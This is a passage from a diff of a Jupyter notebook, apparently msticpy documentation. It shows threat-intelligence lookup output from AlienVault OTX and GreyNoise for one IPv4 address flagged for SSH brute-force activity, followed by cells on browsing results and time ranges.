sp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'author':&nbsp;{'avatar_url':&nbsp;'https://otx20-web-media.s3.amazonaws.com/media/avatars/jnazario/resized/80/Screen&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'Shot&nbsp;2016-07-24&nbsp;at&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'12.24.30&nbsp;PM.png',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'14926',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_following':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribed':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'username':&nbsp;'jnazario'},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'cloned_from':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'comment_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'created':&nbsp;'2020-03-31T03:46:33.896000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'description':&nbsp;'SSH&nbsp;honeypot&nbsp;logs&nbsp;for&nbsp;brute&nbsp;force&nbsp;'<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'attackers&nbsp;from&nbsp;a&nbsp;US&nbsp;/32',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'downvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'export_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'follower_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'groups':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'id':&nbsp;'5e82bd197fcceeffc3784ed9',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'in_group':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_count':&nbsp;3,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'indicator_type_counts':&nbsp;{'FileHash-MD5':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'FileHash-SHA1':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'FileHash-SHA256':&nbsp;1},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_author':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_modified':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'is_subscribing':&nbsp;None,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'locked':&nbsp;False,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified':&nbsp;'2020-03-31T03:46:33.896000',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'modified_text':&nbsp;'386&nbsp;days&nbsp;ago&nbsp;',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'name':&nbsp;'SSH&nbsp;honeypot&nbsp;logs&nbsp;for&nbsp;3/30/2020',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'public':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'pulse_source':&nbsp;'api',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_is_active':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related_indicator_type':&nbsp;'IPv4',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'subscriber_count':&nbsp;1420,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'tags':&nbsp;['SSH',&nbsp;'bruteforce',&nbsp;'honeypot'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'targeted_countries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_has_agents':&nbsp;1,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'threat_hunter_scannable':&nbsp;True,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'upvotes_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'validator_count':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'vote':&nbsp;0,<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'votes_count':&nbsp;0}],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'references':&nbsp;['https://jamesbrine.com.au/bruteforce-ip-list-2020-04-20/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au/bruteforce-ip-list-2020-05-11/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au/bruteforce-ip-list-2020-05-31/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au/bruteforce-ip-list-2020-06-19/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au/bruteforce-ip-list-2020-05-10/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au/bruteforce-ip-list-2020-05-22/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://jamesbrine.com.au/bruteforce-ip-list-2020-04-11/',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'https://github.com/dtag-dev-sec/tpotce'],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'related':&nbsp;{'alienvault':&nbsp;{'adversary':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[]},<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'other':&nbsp;{'adversary':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'industries':&nbsp;[],<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware_families':&nbsp;[]}}},<br>&nbsp;'region':&nbsp;None,<br>&nbsp;'reputation':&nbsp;0,<br>&nbsp;'sections':&nbsp;['general',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'geo',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'reputation',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'url_list',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'passive_dns',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'malware',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'nids_list',<br>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;'http_scans'],<br>&nbsp;'subdivision':&nbsp;None,<br>&nbsp;'type':&nbsp;'IPv4',<br>&nbsp;'type_title':&nbsp;'IPv4',<br>&nbsp;'validation':&nbsp;[],<br>&nbsp;'whois':&nbsp;'http://whois.domaintools.com/51.75.29.61'}</pre>\n        </details>\n        <h3 style='background-color: SteelBlue; padding: 6px'>Type: 'ipv4', Provider: GreyNoise, severity: high</h3><h4>Details</h4>\n<style>\n    .tb_ti_res {border-collapse: collapse; width: 60%; border: 1px solid #ddd !important;}\n    .cell_ti {border: 1px solid #ddd !important;\n        text-align: left !important; padding: 5px !important; height: 12px}\n    .cell_ti_first {border: 1px solid #ddd !important; width: 25%;\n        text-align: left !important; padding: 5px !important; height: 12px}\n</style>\n<table class='tb_ti_res'><tr class='cell_ti'><td class='cell_ti_first'>GreyNoise</td><tr class='cell_ti'><td class='cell_ti_first'>Classification</td><td class='cell_ti'>malicious</td></tr><tr class='cell_ti'><td class='cell_ti_first'>Name</td><td class='cell_ti'>unknown</td></tr><tr class='cell_ti'><td class='cell_ti_first'>Last Seen</td><td class='cell_ti'>2020-07-13</td></tr><tr class='cell_ti'><td class='cell_ti_first'>Message</td><td class='cell_ti'>Success</td></tr><tr class='cell_ti'><td class='cell_ti_first'>Noise</td><td class='cell_ti'>True</td></tr><tr class='cell_ti'><td class='cell_ti_first'>RIOT</td><td class='cell_ti'>False</td></tr></tr></table><h4>Reference: </h4><a href='https://api.GreyNoise.io/v3/community/51.75.29.61'>https://api.GreyNoise.io/v3/community/51.75.29.61</a><br><hr><h4>Raw Results</h4>\n        <details>\n        <summary> <u>Raw results from provider...</u></summary>\n        <pre  style=\"font-size:11px\">{'classification':&nbsp;'malicious',<br>&nbsp;'ip':&nbsp;'51.75.29.61',<br>&nbsp;'last_seen':&nbsp;'2020-07-13',<br>&nbsp;'link':&nbsp;'https://viz.GreyNoise.io/ip/51.75.29.61',<br>&nbsp;'message':&nbsp;'Success',<br>&nbsp;'name':&nbsp;'unknown',<br>&nbsp;'noise':&nbsp;True,<br>&nbsp;'riot':&nbsp;False}</pre>\n        </details>\n        ",
+      "text/plain": "<IPython.core.display.HTML object>"
+     },
+     "metadata": {},
+     "output_type": "display_data"
+    }
+   ],
+   "source": [
+    "from msticpy.nbtools.ti_browser import browse_results\n",
+    "ti_selector = browse_results(data=results, height=\"200px\")\n",
+    "ti_selector"
+   ]
+  },
+  {
+   "cell_type": "markdown",
+   "metadata": {},
+   "source": [
+    "## Specifying Time Ranges\n",
+    "Some providers (currently only AzSTI) support time ranges so that you can specify specific periods to search for.\n",
+    "\n",
+    "If a provider does not support time ranges, the parameters will be ignored"
+   ]
+  },
+  {
